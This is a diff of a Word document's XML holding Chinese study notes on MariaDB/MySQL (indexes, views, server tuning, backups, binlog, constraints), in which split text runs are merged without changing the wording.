--- a/mariadb.docx
+++ b/mariadb.docx
@@ -178,10 +178,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>按照类名设置数据字段名，因为这是最好的可读性。不过</w:t>
-      </w:r>
-      <w:r>
-        <w:t>反正使用的时候大小写都是可以的。数据库无视大小写的区别。</w:t>
+        <w:t>按照类名设置数据字段名，因为这是最好的可读性。不过反正使用的时候大小写都是可以的。数据库无视大小写的区别。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -271,10 +268,7 @@
         <w:t>-</w:t>
       </w:r>
       <w:r>
-        <w:t>》数据库网关和驱</w:t>
-      </w:r>
-      <w:r>
-        <w:t>动加密（前端部署一个数据库加密网关，后者使用</w:t>
+        <w:t>》数据库网关和驱动加密（前端部署一个数据库加密网关，后者使用</w:t>
       </w:r>
       <w:r>
         <w:t>jdbc</w:t>
@@ -504,10 +498,7 @@
         <w:tab/>
       </w:r>
       <w:r>
-        <w:t>优点</w:t>
-      </w:r>
-      <w:r>
-        <w:t>：查询速度快。</w:t>
+        <w:t>优点：查询速度快。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -593,17 +584,7 @@
           <w:szCs w:val="22"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>InnoDB: The PRIMARY KEY is UNIQUE and clustered -- always. Secondary keys are non-clustered. They have the PRIMARY KEY (not a rownu</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242729"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>m or rowid) in the leaf node of the secondary key index.</w:t>
+        <w:t>InnoDB: The PRIMARY KEY is UNIQUE and clustered -- always. Secondary keys are non-clustered. They have the PRIMARY KEY (not a rownum or rowid) in the leaf node of the secondary key index.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -648,29 +629,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:bidi="ar"/>
         </w:rPr>
-        <w:t>（</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="a5"/>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>Log-Structured Merge Tree</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="a5"/>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>）</w:t>
+        <w:t>（Log-Structured Merge Tree）</w:t>
       </w:r>
       <w:r>
         <w:t>：</w:t>
@@ -716,10 +675,7 @@
         <w:ind w:firstLine="500"/>
       </w:pPr>
       <w:r>
-        <w:t>使用日志文件和内存存储来将随机写转换成顺序写</w:t>
-      </w:r>
-      <w:r>
-        <w:t>。</w:t>
+        <w:t>使用日志文件和内存存储来将随机写转换成顺序写。</w:t>
       </w:r>
       <w:r>
         <w:t>LSM</w:t>
@@ -728,10 +684,7 @@
         <w:t>树的主要目标是快速的建立索引，在大并发插入数据的情况下，</w:t>
       </w:r>
       <w:r>
-        <w:t>B</w:t>
-      </w:r>
-      <w:r>
-        <w:t>+</w:t>
+        <w:t>B+</w:t>
       </w:r>
       <w:r>
         <w:t>树需要大量的随机</w:t>
@@ -752,10 +705,7 @@
         <w:t>LSM</w:t>
       </w:r>
       <w:r>
-        <w:t>通过磁盘序列写，来达到最优的写性能，因为这个降</w:t>
-      </w:r>
-      <w:r>
-        <w:t>低了磁盘的寻道次数，一次</w:t>
+        <w:t>通过磁盘序列写，来达到最优的写性能，因为这个降低了磁盘的寻道次数，一次</w:t>
       </w:r>
       <w:r>
         <w:t>IO</w:t>
@@ -793,10 +743,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">CREATE VIEW IS_Student AS SELECT Sno, Sname, Sage FROM Student WHERE </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Sdept='IS' [CHECK</w:t>
+        <w:t>CREATE VIEW IS_Student AS SELECT Sno, Sname, Sage FROM Student WHERE Sdept='IS' [CHECK</w:t>
       </w:r>
       <w:r>
         <w:t>语句</w:t>
@@ -841,10 +788,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">DROP </w:t>
-      </w:r>
-      <w:r>
-        <w:t>VIEW &lt;</w:t>
+        <w:t>DROP VIEW &lt;</w:t>
       </w:r>
       <w:r>
         <w:t>视图名</w:t>
@@ -915,10 +859,7 @@
         <w:t>SQL</w:t>
       </w:r>
       <w:r>
-        <w:t>会自己将命令整合到一起进行最</w:t>
-      </w:r>
-      <w:r>
-        <w:t>终的执行。</w:t>
+        <w:t>会自己将命令整合到一起进行最终的执行。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -984,10 +925,7 @@
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>new.de</w:t>
-      </w:r>
-      <w:r>
-        <w:t>pt</w:t>
+        <w:t>new.dept</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -1080,10 +1018,7 @@
         <w:t>varbinary</w:t>
       </w:r>
       <w:r>
-        <w:t>类型列时，如</w:t>
-      </w:r>
-      <w:r>
-        <w:t>果向表中插入的数据行超过</w:t>
+        <w:t>类型列时，如果向表中插入的数据行超过</w:t>
       </w:r>
       <w:r>
         <w:t>8092</w:t>
@@ -1107,10 +1042,7 @@
         <w:t>SQL</w:t>
       </w:r>
       <w:r>
-        <w:t>）的增强版本</w:t>
-      </w:r>
-      <w:r>
-        <w:t>）失败，并产生错误信息。</w:t>
+        <w:t>）的增强版本）失败，并产生错误信息。</w:t>
       </w:r>
       <w:r>
         <w:t>SQL Server</w:t>
@@ -1316,10 +1248,7 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>双写缓</w:t>
-      </w:r>
-      <w:r>
-        <w:t>存等等依然在</w:t>
+        <w:t>双写缓存等等依然在</w:t>
       </w:r>
       <w:r>
         <w:t>ibdata1</w:t>
@@ -1394,10 +1323,7 @@
         <w:t>的内存大小。你需要设置</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> my</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">.cnf </w:t>
+        <w:t xml:space="preserve"> my.cnf </w:t>
       </w:r>
       <w:r>
         <w:t>中的此项</w:t>
@@ -1516,10 +1442,7 @@
         <w:t>设置</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> MyS</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">QL </w:t>
+        <w:t xml:space="preserve"> MySQL </w:t>
       </w:r>
       <w:r>
         <w:t>的最大连接数</w:t>
@@ -1653,10 +1576,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t>mysql&gt; show stat</w:t>
-      </w:r>
-      <w:r>
-        <w:t>us like 'Connections';</w:t>
+        <w:t>mysql&gt; show status like 'Connections';</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1708,10 +1628,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">mysql&gt; set global </w:t>
-      </w:r>
-      <w:r>
-        <w:t>thread_cache_size = 16;</w:t>
+        <w:t>mysql&gt; set global thread_cache_size = 16;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1899,10 +1816,7 @@
         <w:t xml:space="preserve"> 64M </w:t>
       </w:r>
       <w:r>
-        <w:t>并在</w:t>
-      </w:r>
-      <w:r>
-        <w:t>以后及时去增加。</w:t>
+        <w:t>并在以后及时去增加。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1969,10 +1883,7 @@
         <w:t xml:space="preserve"> tmp_table_size </w:t>
       </w:r>
       <w:r>
-        <w:t>是内置内存表的最大空间。如果表的大小超出限值</w:t>
-      </w:r>
-      <w:r>
-        <w:t>将会被转换为磁盘上的</w:t>
+        <w:t>是内置内存表的最大空间。如果表的大小超出限值将会被转换为磁盘上的</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> MyISAM </w:t>
@@ -2056,10 +1967,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">slow-query-log-file = </w:t>
-      </w:r>
-      <w:r>
-        <w:t>/var/lib/mysql/mysql-slow.log</w:t>
+        <w:t>slow-query-log-file = /var/lib/mysql/mysql-slow.log</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2194,10 +2102,7 @@
         <w:t xml:space="preserve"> Btrfs</w:t>
       </w:r>
       <w:r>
-        <w:t>。它们都是可以使用超大文件和</w:t>
-      </w:r>
-      <w:r>
-        <w:t>大容量存储卷的企业级日志型文件系统。</w:t>
+        <w:t>。它们都是可以使用超大文件和大容量存储卷的企业级日志型文件系统。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2309,10 +2214,7 @@
         <w:t xml:space="preserve"> MySQL </w:t>
       </w:r>
       <w:r>
-        <w:t>的错误日志看到一个错误。建议将该值设</w:t>
-      </w:r>
-      <w:r>
-        <w:t>置为最大包的大小。此值设置得过低可能会导致查询速度变得非常慢，然后你会在</w:t>
+        <w:t>的错误日志看到一个错误。建议将该值设置为最大包的大小。此值设置得过低可能会导致查询速度变得非常慢，然后你会在</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> MySQL </w:t>
@@ -2372,10 +2274,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t># cd major-MySQLTuner-per</w:t>
-      </w:r>
-      <w:r>
-        <w:t>l-993bc18/</w:t>
+        <w:t># cd major-MySQLTuner-perl-993bc18/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2441,10 +2340,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t># mysqlcheck -u root -p --auto-repair --check --optim</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ize --all-databases</w:t>
+        <w:t># mysqlcheck -u root -p --auto-repair --check --optimize --all-databases</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2555,10 +2451,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>regsvr32 /u c:\windows\system32\scrrun.d</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ll /s</w:t>
+        <w:t>regsvr32 /u c:\windows\system32\scrrun.dll /s</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2616,10 +2509,7 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>完全备份就是指对某一个时间点上的所有数据或应用进行的一个完全拷贝。实际应用中就是用一盘磁带对整个系统进行完全备份，包括其中的系统和所有数据。这种备份方式最大的好处就是只要用一盘磁带，就可以恢复丢失的</w:t>
-      </w:r>
-      <w:r>
-        <w:t>数据。因此大大加快了系统或数据的恢复时间。然而它的不足之处在于，各个全备份磁带中的备份数据存在大量的重复信息；另外，由于每次需要备份的数据量相当大，因此备份所需时间较长。</w:t>
+        <w:t>完全备份就是指对某一个时间点上的所有数据或应用进行的一个完全拷贝。实际应用中就是用一盘磁带对整个系统进行完全备份，包括其中的系统和所有数据。这种备份方式最大的好处就是只要用一盘磁带，就可以恢复丢失的数据。因此大大加快了系统或数据的恢复时间。然而它的不足之处在于，各个全备份磁带中的备份数据存在大量的重复信息；另外，由于每次需要备份的数据量相当大，因此备份所需时间较长。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2668,18 +2558,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>备份自上一次备份（包含完全备份、差异备</w:t>
-      </w:r>
-      <w:r>
-        <w:t>份、增量备份）之后有变化的数据。增量备份过程中，只备份有标记的选中的文件和文件夹，它清除标记，既：备份后标记文件，换言之，清除存档属性。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>增量备份是指在一次全备份或上一次增量备份后，以后每次的备份只需备份与前一次相比增加和者被修改的文件。这就意味着，第一次增量备份的对象是进行全备后所产生的增加和修改的文件；第二次增量备份的对象是进行第一次增量备份后所产生的增加和修改的文件，如此类推。这种备份方式最显著的优点就是：没有重复的备份数据，因此备份的数据量不大，备份所需的时间很短。但增量备份的数据恢复是比较麻烦的。</w:t>
-      </w:r>
-      <w:r>
-        <w:t>您必须具有上一次全备份和所有增量备份磁带（一旦丢失或损坏其中的一盘磁带，就会造成恢复的失败），并且它们必须沿着从全备份到依次增量备份的时间顺序逐个反推恢复，因此这就极大地延长了恢复时间。</w:t>
+        <w:t>备份自上一次备份（包含完全备份、差异备份、增量备份）之后有变化的数据。增量备份过程中，只备份有标记的选中的文件和文件夹，它清除标记，既：备份后标记文件，换言之，清除存档属性。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>增量备份是指在一次全备份或上一次增量备份后，以后每次的备份只需备份与前一次相比增加和者被修改的文件。这就意味着，第一次增量备份的对象是进行全备后所产生的增加和修改的文件；第二次增量备份的对象是进行第一次增量备份后所产生的增加和修改的文件，如此类推。这种备份方式最显著的优点就是：没有重复的备份数据，因此备份的数据量不大，备份所需的时间很短。但增量备份的数据恢复是比较麻烦的。您必须具有上一次全备份和所有增量备份磁带（一旦丢失或损坏其中的一盘磁带，就会造成恢复的失败），并且它们必须沿着从全备份到依次增量备份的时间顺序逐个反推恢复，因此这就极大地延长了恢复时间。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2697,10 +2581,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>以每周数据备份计划为例，我们可以在星期一进行完全备份，在星期二至星期五进行差异备份。如果在星期五数据被破坏了，则你只需要还</w:t>
-      </w:r>
-      <w:r>
-        <w:t>原星期一完全的备份和星期四的差异备份。这种策略备份数据需要较多的时间，但还原数据使用较少的时间。</w:t>
+        <w:t>以每周数据备份计划为例，我们可以在星期一进行完全备份，在星期二至星期五进行差异备份。如果在星期五数据被破坏了，则你只需要还原星期一完全的备份和星期四的差异备份。这种策略备份数据需要较多的时间，但还原数据使用较少的时间。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2770,14 +2651,7 @@
           <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display" w:hint="default"/>
           <w:color w:val="4D4D4D"/>
         </w:rPr>
-        <w:t>更新数据库突</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display" w:hint="default"/>
-          <w:color w:val="4D4D4D"/>
-        </w:rPr>
-        <w:t>然断电怎么办？</w:t>
+        <w:t>更新数据库突然断电怎么办？</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2788,88 +2662,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:bidi="ar"/>
         </w:rPr>
-        <w:t>#1. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>如果设置了显式事务</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>(BEGIN TRAN/COMMIT TRAN),</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>在</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>COMMIT</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>前断的电</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>不用担心</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>系统会自动回滚未提交的事务</w:t>
+        <w:t>#1. 如果设置了显式事务(BEGIN TRAN/COMMIT TRAN),在COMMIT前断的电,不用担心.系统会自动回滚未提交的事务</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2879,106 +2672,7 @@
           <w:lang w:bidi="ar"/>
         </w:rPr>
         <w:br/>
-        <w:t>#2. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>如果没有显式设置事务</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>系统将为每条</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>SQL</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>生成一个事务</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>再启动电脑时</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>事务会恢复到最后一条操作失败的</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>SQL</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
-          <w:color w:val="4F4F4F"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:bidi="ar"/>
-        </w:rPr>
-        <w:t>语句处</w:t>
+        <w:t>#2. 如果没有显式设置事务,系统将为每条SQL生成一个事务,再启动电脑时,事务会恢复到最后一条操作失败的SQL语句处</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -3050,43 +2744,7 @@
         <w:rPr>
           <w:color w:val="000000"/>
         </w:rPr>
-        <w:t>它记录了所有的</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:t>DDL</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:t>和</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:t>DML(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:t>除了数据查询语句</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:t>语句，以事件形式记录，还包含语句所执行的消耗的时间。</w:t>
+        <w:t>它记录了所有的DDL和DML(除了数据查询语句)语句，以事件形式记录，还包含语句所执行的消耗的时间。</w:t>
       </w:r>
       <w:r>
         <w:t>还可以记录每一行数据的变化</w:t>
@@ -3098,13 +2756,7 @@
         <w:t>，</w:t>
       </w:r>
       <w:r>
-        <w:t>但是这样</w:t>
-      </w:r>
-      <w:r>
-        <w:t>log</w:t>
-      </w:r>
-      <w:r>
-        <w:t>会很大</w:t>
+        <w:t>但是这样log会很大</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3113,19 +2765,7 @@
         <w:t>。</w:t>
       </w:r>
       <w:r>
-        <w:t>或者</w:t>
-      </w:r>
-      <w:r>
-        <w:t>Statement level</w:t>
-      </w:r>
-      <w:r>
-        <w:t>、</w:t>
-      </w:r>
-      <w:r>
-        <w:t>Row level</w:t>
-      </w:r>
-      <w:r>
-        <w:t>混合</w:t>
+        <w:t>或者Statement level、Row level混合</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3134,13 +2774,7 @@
         <w:t>，</w:t>
       </w:r>
       <w:r>
-        <w:t>用到</w:t>
-      </w:r>
-      <w:r>
-        <w:t>MySQL</w:t>
-      </w:r>
-      <w:r>
-        <w:t>的特殊功能（存储过程、触发器、函数）需使用混合模式</w:t>
+        <w:t>用到MySQL的特殊功能（存储过程、触发器、函数）需使用混合模式</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3154,19 +2788,7 @@
         <w:rPr>
           <w:rStyle w:val="HTML0"/>
         </w:rPr>
-        <w:t xml:space="preserve">mysqlbinlog </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="HTML0"/>
-        </w:rPr>
-        <w:t>工具用于解析</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="HTML0"/>
-        </w:rPr>
-        <w:t>binlog</w:t>
+        <w:t>mysqlbinlog 工具用于解析binlog</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3473,10 +3095,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>ERROR 1064 (42000): You have an error in your SQL syntax; check the ma</w:t>
-      </w:r>
-      <w:r>
-        <w:t>nual that corresponds to your MariaDB server version for the right syntax to use near 'on' at line 1</w:t>
+        <w:t>ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'on' at line 1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3604,10 +3223,7 @@
         <w:t>命令还是很讲究的</w:t>
       </w:r>
       <w:r>
-        <w:t>,mysql -u guest -p -h 127.0.0</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.1 collage</w:t>
+        <w:t>,mysql -u guest -p -h 127.0.0.1 collage</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3775,10 +3391,7 @@
         <w:t>使用</w:t>
       </w:r>
       <w:r>
-        <w:t>order b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y</w:t>
+        <w:t>order by</w:t>
       </w:r>
       <w:r>
         <w:t>对结果集进行排序。</w:t>
@@ -3950,8 +3563,6 @@
     <w:p>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:r>
         <w:t>utf8_bin</w:t>
       </w:r>
       <w:r>
@@ -4056,10 +3667,7 @@
         <w:tab/>
       </w:r>
       <w:r>
-        <w:t>列值满足</w:t>
-      </w:r>
-      <w:r>
-        <w:t>表达式</w:t>
+        <w:t>列值满足表达式</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> CHECK</w:t>
@@ -4141,10 +3749,7 @@
         <w:t xml:space="preserve">　　　　</w:t>
       </w:r>
       <w:r>
-        <w:t>&gt;= (select sum</w:t>
-      </w:r>
-      <w:r>
-        <w:t>(balance) from account</w:t>
+        <w:t>&gt;= (select sum(balance) from account</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4241,8 +3846,6 @@
     <w:p>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:r>
         <w:t xml:space="preserve">CONSTRAINT FK_sno FOREIGN KEY (sno) REFERENCES student, </w:t>
       </w:r>
     </w:p>
@@ -4293,10 +3896,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>2) CONSTR</w:t>
-      </w:r>
-      <w:r>
-        <w:t>AINT xxxx CHECK(Ssex IN('man','male'))</w:t>
+        <w:t>2) CONSTRAINT xxxx CHECK(Ssex IN('man','male'))</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4318,10 +3918,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>ALTER table</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> xxx add CONSTRAINT FK_cno FOREIGN KEY (cno) REFERENCES course(cno)</w:t>
